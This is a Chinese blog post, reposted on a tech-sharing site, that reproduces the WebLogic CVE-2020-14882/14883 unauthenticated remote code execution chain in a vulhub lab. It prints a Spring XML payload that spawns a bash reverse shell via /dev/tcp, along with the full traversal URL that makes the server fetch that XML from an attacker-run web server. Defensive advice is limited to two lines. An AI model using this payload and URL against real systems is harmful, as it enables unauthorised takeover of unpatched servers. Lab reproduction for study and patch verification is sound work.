标签：vulhub 14882 漏洞 2020 Weblogic CVE com

0X00-引言

---

最近有点急功心切，想直接变成大佬，难免有点眼高手低，导致现在看一些事情都会变得不爽，总觉得自己才是对的，甚至有点焦虑。心态出了问题，需要调整一下，一口气吃不了一个胖子，欲速则不达，呼气吐气，呼气吐气。

这世界大部分的抒情，都会被认为无病呻吟，能够理解你得了什么病，基本都是知己。

------《云边有个小卖部》

0X01-环境搭建

---

靶机：CentOS Linux 7

攻击机：windows server 2016 && Kail

环境：vulhub

项目地址：https://github.com/vulhub/vulhub

搭建vulhub请访问：空白centos7 64 搭建vulhub(详细)

0X02-漏洞描述

---

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

0X03-漏洞复现

---

01-反弹shell

POC：

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i /dev/tcp/IP/PORT 0>&1]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

生成XML文件，在kali中开启web服务

通过以下URL使Weblogic加载XML

http://192.168.234.128:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.234.135:666/POC.xml")

成功反弹

0X04-漏洞防御

---

禁止访问console

升级版本

0X05-免责声明

---

仅供学习参考

0X06-参考

---

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md

标签：vulhub,14882,漏洞,2020,Weblogic,CVE,com
来源： https://www.cnblogs.com/peace-and-romance/p/15743521.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。